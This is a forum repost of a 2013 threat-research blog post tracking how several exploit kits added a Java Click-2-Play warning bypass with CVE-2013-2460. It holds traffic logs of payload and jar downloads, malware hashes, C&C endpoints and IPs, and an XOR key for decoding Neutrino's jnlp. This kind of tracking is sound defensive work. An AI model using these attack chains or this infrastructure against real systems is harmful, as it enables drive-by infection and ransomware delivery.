jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits

[Nytro]

[h=1]jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits[/h]

A new variant of a "Kore-ish" Cool EK appeared few days ago.

Yes...it's difficult to follow the EK fast moving landscape...No payload in the jar for that one.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Some instances of this "Cool EK"

in URLQuery[/TD]

[/TR]

[/TABLE]

I faced it often where I used to see Kore (aka Sibhost) Exploit Kit.

It is also used to spread the Urausy Ransomware and FakeAV (so... BestAV stuff)

All jar found there were identical as those in Blackhole. Till today.

CVE-2013-2460 + Click2Play Bypass :

That CVE was already in use in Private Exploit Pack but it was noisy (Imposition then made it optional )

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]CVE-2013-2460 successfull path in Cool EK (Kore-ish)

Click2Play Bypass inside 2013-09-20[/TD]

[/TR]

[/TABLE]

GET http://[redacted].tacogratis .com/index.php?p=5267

200 OK (text/html)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Key Piece of the landing[/TD]

[/TR]

[/TABLE]

GET http://[redacted].tacogratis .com/index.php?p=5290

200 OK (text/javascript)

GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30

200 OK (application/java-archive)

GET http://[redacted].tacogratis .com/index.php?p=5268

200 OK (application/java-archive)

GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14

200 OK (application/x-msdownload) 170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)

----- Off Topic ----

Payload is rotating fast (2 more md5) :

b56348220f83ad9db50cb5beb564148b

64ef8f2cb215af4b2fbcb51cadfcc025

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Urauy Ransomware - DE design - 2013-09-20

(BestAV soft 2)[/TD]

[/TR]

[/TABLE]

Note : on another thread you can get a FakeAV

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Payload call with bigger charge[/TD]

[/TR]

[/TABLE]

9d8d3094849f685859945140721aafb1

7fb9423c4bdf7080137745e81ba38362

13e24b552ea472146495ac8a33cca975

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Other payload from this "Kore-ish" Cool EK

(BestAV Soft1)[/TD]

[/TR]

[/TABLE]

-------------------

So what's that Click2Play bypass ?

Quite surely : Bugtraq: VUPEN Security Research - Oracle Java Preloader Click-2-Play Warning Bypass Vulnerability

2013-06-18 - Vulnerability Fixed in Java 7u25

Yes :

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD][/TD]

[/TR]

[TR]

[TD=class: tr-caption]Warning with jre7u25

(and as CVE-2013-2460 is patch too...clicking on run there won't put you at risk)

[/TD]

[/TR]

[/TABLE]

It's the first time I see that.

5 days ago :

Who sold it ?

??

No download link for now. Yes it will spread fast anyway.

It's easy to get rid of all these Exploit Kits : update !

<edit1 2013-09-21>

Already in Sakura...surely cause of that blog post. It's often difficult to decide how much you can write about something.

Sakura CVE-2013-2460 & Click2Play Bypass :

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center] Sakura featuring CVE-2013-2460 & Click2Play bypass

2013-09-21

[/TD]

[/TR]

[/TABLE]

GET http://[redacted]253 .pw:8509/me.php

200 OK (text/html)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Precision Strike

new Click2Play bypass for 21 version[/TD]

[/TR]

[/TABLE]

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Jnlp call[/TD]

[/TR]

[/TABLE]

GET http://[redacted] .pw:8509/[redacted].ee

200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Piece of CVE-2013-2460 in Sakura Jar

2013-09-21

[/TD]

[/TR]

[/TABLE]

GET http://[redacted] .pw:8509/bodystarswild.ee

200 OK (application/java-archive)

GET http://[redacted] .pw:8509/2889.ld

200 OK (application/octet-stream) Once decoded : 5fba8226303967ccfd27ea8710a8b99d I think it's a Smokebot

----- Off Topic ----

C&C Calls :

mexstat757.com POST /satep757/index.php

mexstat220.pw GET /setex/sev57.exe

mexstat220.pw GET /setex/pm555.exe

etc...

46.165.201.27

16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH

It's the same guys than those who were behind this one year old post :

From Sakura to Reveton via Smoke Bot - Or a Botnet Distribution of Reveton 2012-09-12

Since then Smoke Bot is now encrypting its network calls.

Analysis by Joe Sandbox Cloud

----------------------

</edit1>

<edit2: 2013-09-23>

Nuclear Pack : CVE-2013-2460 + Click2Play bypass

Announced Underground :

"???????? ???? exploit, ?????? ????????. ???????? ???? ? ?? ???????" Nuclear

which means something like:

"New exploit added, breaking rate increased, works silently and scorched"

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]CVE-2013-2460 with no security prompt successful path in Nuclear Pack

2013-09-23[/TD]

[/TR]

[/TABLE]

GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html

200 OK (text/html)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Precision Strike (Thanks @EKWatcher )[/TD]

[/TR]

[/TABLE]

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]jnlp call in Nuclear Pack

After Deobfuscation (Thanks @EKWatcher )[/TD]

[/TR]

[/TABLE]

GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar

200 OK (application/java)

GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar

200 OK (application/java) e03455403f226b23be42b30733a26101

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Piece of CVE-2013-2460 in Nuclear Pack

2013-09-23[/TD]

[/TR]

[/TABLE]

GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2

200 OK (application/octet-stream) Decoded : 3a9d1dcad1176717711eb92b25f7d6b0

GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2

200 OK (application/octet-stream)

----------- Out of Topic -----------

C&C :

185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.

for instance :

POST /mBj7cjhH/gate.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Connection: close

User-Agent: Mozilla/4.0

Host: halifaxkilo.com

Analysis by Joe Sandbox Cloud

------------------------------------

</edit2>

<edit3>

Styx CVE-2013-2472 + Click2Play Bypass :

Many Thanks to Timo Hirvonen from F-Secure for identifying the CVE.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Reveton Pushed in Styx 2013-09-24

Using CVE-2013-2472 & Click2Play Bypass on jre7u21

We can see the call for Bitcoin miner after VM Reboot.[/TD]

[/TR]

[/TABLE]

GET http://[redacted].info/hsZv/3J17_DtR/13C_ht11nF-E17H_R60kufr_0HUzD0c/xrB/055RR0/iWsU0-VEw-x0Rm-ou0xvC-3/

302 Found to http://an-wis.info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/

200 OK (text/html)

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/yavirts.html

200 OK (text/html)

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/jplay.html

200 OK (text/html) (jnlp call)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Click2Play Bypass in Styx

2013-09-24[/TD]

[/TR]

[/TABLE]

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/NyJjQvjE.jar

200 OK (application/java-archive)

GET http://[redacted].info/uhoTif0-WROr0Q-37C0-yBpl_0aj_cG16VuZ-02qAE/0JPA/w09M/S80Jx/Hc0oCWv_0nM3V-12GaV0/PRhA0DV_5j0SVPd0_gTY8/087-Ei00X-ri0W_8rf0nQV-S0jRk9-0jX_AJ0XhbQ/09W5/L07cS20/QYjr0TG-2r_0vM0-I038Gx0_AYCo0z70V/0sy-Lq0E6N-s0TW70/0U1w2-15hVc0U_zhI0/HLYx0gj_iQ16G-rf0hrk/D137BV_05Qr/Q0Nr8A0RN/GY0Vt-dw0Ke-7d17t9_n0Wnx-B/NyJjQvjE.jar

200 OK (application/java-archive) 3c812730758b9118ba4764adf3ab53bc

GET http://[redacted].info/r007gL_0e2X80Ooo-30N1XG/0C/rt/d0tg2C-0e_l6L0H_NL40C05W/0aDec0A/b5g-04-yuI0i3/KS00i/AE0m/VuD0uHFw0/pRgP0Dy-z80J_Aek0Y_hcr0AhC_80_lWyk13f/It0865-L0O_GKn-0E/1dA0baP00-1EAC0QAs/R0f-4Bq0ZIn-f0X_4n-30otyr-05Y83-0ZxLA/17y/RZ0I/MM60-Ajpo06eml/0gVj_P0Yv3E0MRn/30AF6J0H/9ZU0f/WRI0wAPs11/ttO0CZz_j0leh-i0k1X_l0oDdd_0ah_pC/kC4XSO15ZD.exe?lniV=7decb&h=16

200 OK (application/x-dosexec) 4a0e95c28b2b5b6259b7b558c3565988

----------- Out of Topic : Payload -----------

Reveton.

C&C Reverse Proxy :

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Reveton Calling Home

2013-09-24[/TD]

[/TR]

[/TABLE]

64.191.122.10 - 21788 | 64.191.0.0/17 | NOC | US | NOCINC.COM | NETWORK OPERATIONS CENTER INC.

We can see the call to the Bitcoin Miner (read: Ransomware Puts Your System To Work Mining Bitcoins )

The binary is not there anymore since 2013-09-11 (was : 2794fd5b64b585df132b4524b82d18c8 )

--------------------------------------------------

</edit3>

<edit4 : 2013-09-24>

Neutrino : CVE-2013-2460 + Click2Play bypass

It seems the integration has been far from smooth for the Neutrino coder.

The jar is inside the Exploit Kit since more than 3 days. The coder announced the new exploit 2 days ago...but the warning was still here and even validating the execution your were safe. Some protections were removed (you could hit the exploit kit as many time as you want with same IP without problem...seems like someone else was testing it ). And the 22 (sunday) more than half a day with all threads in 404...But in the end...he made it.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]CVE-2013-2460 + Click2Play ByPass in Neutrino

2013-09-24[/TD]

[/TR]

[/TABLE]

Will only keep relevant calls :

GET http://[redacted].dyndns .info:8000/gxstfkhf?ttdwjipi=4128154

200 OK (text/html)

GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js

200 OK (text/javascript)

GET http://[redacted].dyndns .info:8000/index.js

200 OK (application/x-javascript)

POST http://[redacted].dyndns .info:8000/twpnnurhbg

200 OK (text/html)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Encoded Jnlp[/TD]

[/TR]

[/TABLE]

Applying the Neutrino "xor" function with key "qoxacfix"

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Jnlp[/TD]

[/TR]

[/TABLE]

Base64 decode of the jnlp_embedded value :

GET http://[redacted].dyndns .info:8000/rclmrcfdvdjtq?joiihv=uihuzdhhuq

200 OK (application/java-archive)

GET http://[redacted].dyndns .info:8000/rclmrcfdvdjtq?joiihv=uihuzdhhuq

200 OK (application/java-archive) 3fcac6c64ce0ca28ee615a8fad224dd3

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Piece of slightly obfuscated CVE-2013-2460 in Neutrino

(since 2013-09-21 in fact)[/TD]

[/TR]

[/TABLE]

GET http://[redacted].dyndns .info:8000/faybcc?juzickeew=uihuzdhhuq

200 OK (application/octet-stream) Decoded : a126281477c856b9358de5aea1369990 who drop : 898b9aee9931230ef3bc0c59eb541c55 - Didn't spend too much time to figure out what it is.

Saw 404 POST to : http://allewnuado .ru/perl/config.php - 79.174.64.127

47385 | 79.174.64.0/19 | HOSTING-COMPANY | RU | HC.RU | HOSTING CENTER LTD.

</edit4>

<edit5 2013-09-25>

Blackhole : CVE-2013-2460 Click2Play Bypass

I saw that jar yesterday already being pushed without exploitation to jre7u21 in /closest/ Blackhole.

It's the exact same jar as the Cool EK in "/index.php?p=" that introduce the Bypass.

Today on the /Home/ (aka q.php) Darkleech fuelled BH EK the Click2Play bypass is here.

And payload is as always Pony (steal passwords and act as loader. No change since at least December. It pushes Urausy in some countries or Nymaim in other countries (which can then get another version of Nymaim with locker functionnality or Zaccess).

This has been well explained by Eset.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]BH EK /Home/ aka q.php CVE-2013-2460 + Click2play bypass

2013-09-25[/TD]

[/TR]

[/TABLE]

GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php

200 OK (text/html)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Conditions for the bypass call[/TD]

[/TR]

[/TABLE]

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]jnlp call[/TD]

[/TR]

[/TABLE]

GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?!0M!6J=1F_*H4z-I*!f&Jk__*zFA_92-*=7*K9_Kp1

200 OK (application/java-archive)

GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?!0M!6J=1F_*H4z-I*!f&Jk__*zFA_92-*=7*K9_Kp1

200 OK (application/java-archive) f5fc4540e6e64efee8711007ac0d4ed1

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]CVE-2013-2460 in BH EK

2013-09-25[/TD]

[/TR]

[/TABLE]

GET http://64.246.3 .59/e354340618f9c3a8d474225ef7cc6b2a/panic-portable.php?-*Z73922k0NUj8=8b8cwd8aww&*F21!gX=w88c8dw6wdw7wbwbwd8c&!_239!6W25u*_=ww&59*!a34-d1_2!uT=u*g88*8&OF2EFwol0!3_9=7ZF!Y*08*!P_75m

200 OK (application/x-msdownload) - acb80f0eaa177953a53f3be188c8e3da Analysis and sample: Malwr.com

</edit5>

Posted 1 week ago by Kafeine

Sursa: Malware don't need Coffee: jre7u21 and earlier Click-2-Play Warning Bypass integrating Exploit Kits